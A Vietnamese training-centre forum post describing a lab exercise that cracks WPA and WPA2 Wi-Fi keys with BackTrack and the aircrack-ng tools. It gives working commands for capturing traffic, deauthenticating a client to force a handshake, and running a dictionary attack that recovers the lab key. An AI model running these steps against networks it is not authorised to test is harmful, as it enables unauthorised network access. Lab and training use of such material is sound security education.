Xin chào ! Nếu đây là lần đầu tiên bạn đến với diễn đàn, xin vui lòng danh ra một phút bấm vào đây để đăng kí và tham gia thảo luận cùng VnPro.

Announcement

Collapse
No announcement yet.

LAB: Crack Khóa Wpa Trong Mạng Wlan

Collapse
X
 
  • Filter
  • Time
  • Show
Clear All
new posts

  • LAB: Crack Khóa Wpa Trong Mạng Wlan

    LAB: CRACK KHÓA WPA TRONG MẠNG WLAN
    Nhóm thực tập: GTVT
    THIẾT BỊ :
    vMột AP làm AP target
    vMột PC có card wireless làm client target.
    vMột PC có card wireless làm attacker
    vMột đĩa CD backtrack 3.0 beta

    YÊU CẦU:
    vĐể crack được wpa thì yêu cầu phải có môi trường cơ sở dữ liệu SQLite. Ta có thể download SQLite tại http://www.sqlite.org/sqlite-3.5.7.tar.gz .
    vMột list chứa các password, list này phải đảm bảo có chứa khoá của mạng mà ta cần hack
    vMột list chứa các ssid, list này phải đảm bảo có chứa ssid của AP target.
    Bài lab này sẽ tiến hành crack các loại khoá là WPA PERSONAL TKIP, WPA PERSONAL AES, WPA2 AES và WPA2 TKIP+AES.

    CÁC BƯỚC TIẾN HÀNH CRACK:
    vCÀI ĐẶT SQLite như sau:
    tar xvzf /root/Desktop/sqlite/sqlite-3.5.7.tar.gz
    cd sqlite-3.5.7
    ./configure --prefix=/usr/local
    Make

    CRACK WPA TKIP:
    ·Chuyển card wireless về monitor mode như hình sau:


    • Dò tìm kênh và MAC address của AP target và client target bằng lệnh airodump-ng ath0 , kết quả dò tìm như hình sau:



    • Tiến hành bắt gói trên kênh và MAC address của AP target vừa tìm được bằng lệnh:
    airodump-ng –c 1 –w/root/desktop/capture/wpa –bssid 00:14:bf:05: d6:0c ath0



    • Tiếp theo, ta dùng tool aireplay và MAC address của client target để tạo ra 4 bước bắt tay với AP target :
    Aireplay-ng -0 1 –a 00:14:bf:05: d6:0c –c 00:16:b6:99:74:78 ath0



    • Quay lại màn hình bắt gói airodump quan sát ta thấy quá trình bắt tay đã diễn ra như hình sau:



    Thế là ta đã capture được 4 bước bắt tay với AP target.
    • Dùng tool airolib-ng để tạo cơ sở dữ liệu cho quá trình crack bằng lệnh airolib-ng vnpro_gtvt_hcm init
    với vnpro_gtvt_hcm là tên của cơ sở dữ liệu được chứa mặc định trong home folder.
    Sau đó, ta import các list password và list ssid vào cơ sỡ dữ liệu vnpro_gtvt_hcm như sau:
    Airolib-ng vnpro_gtvt_hcm import ascii essid dictionary.txt
    /* với dictionary.txt là list chứa tên các ssid */



    Airolib-ng vnpro_gtvt_hcm import ascii passwd password.lst
    /* với password.lst là file chứa các password */



    • Ta kết hợp các ssid với password với nhau sau khi import thành công list password và list ssid bằng lệnh:
    Airolib-ng vnpro_gtvt_hcm batch
    kiểm tra lại số ssid và password hợp lệ mà ta có bằng lệnh sau:
    Airolib-ng vnpro_gtvt_hcm stats



    • mở một shell mới chạy tool aircrack-ng để tìm khoá :
    aircrack-ng –r vnpro_gtvt_hcm /root/desktop/capture/wpa*.cap



    Sau khi lệnh thực hiện xong, ta thu được key



    Quá trình crack khoá WPA AES, WPA2 AES và WPA2 TKIP+AES bao gồm các bước thực hiện hoàn toàn như việc crack WPA TKIP. Tiếp theo, ta chỉ kiểm tra quá trình tìm ra khoá của các loại khoá trên

    CRACK WAP AES



    Khoá tìm được :



    CRACK WPA2 AES





    CRACK WPA2 TKIP+AES


    Chạy lệnh tool aircrack để tìm key


    Tìm được key là vnprogtvthcmtkipvaaes (vnpro gtvt hcm tkip và aes)



    Chúc mọi người vui !!!
    Phạm Minh Tuấn

    Email : phamminhtuan@vnpro.org
    Yahoo : phamminhtuan_vnpro
    -----------------------------------------------------------------------------------------------
    Trung Tâm Tin Học VnPro
    149/1D Ung Văn Khiêm P25 Q.Bình thạnh TPHCM
    Tel : (08) 35124257 (5 lines)
    Fax: (08) 35124314

    Home page: http://www.vnpro.vn
    Support Forum: http://www.vnpro.org
    - Chuyên đào tạo quản trị mạng và hạ tầng Internet
    - Phát hành sách chuyên môn
    - Tư vấn và tuyển dụng nhân sự IT
    - Tư vấn thiết kế và hỗ trợ kỹ thuật hệ thống mạng

    Network channel: http://www.dancisco.com
    Blog: http://www.vnpro.org/blog
Working...
X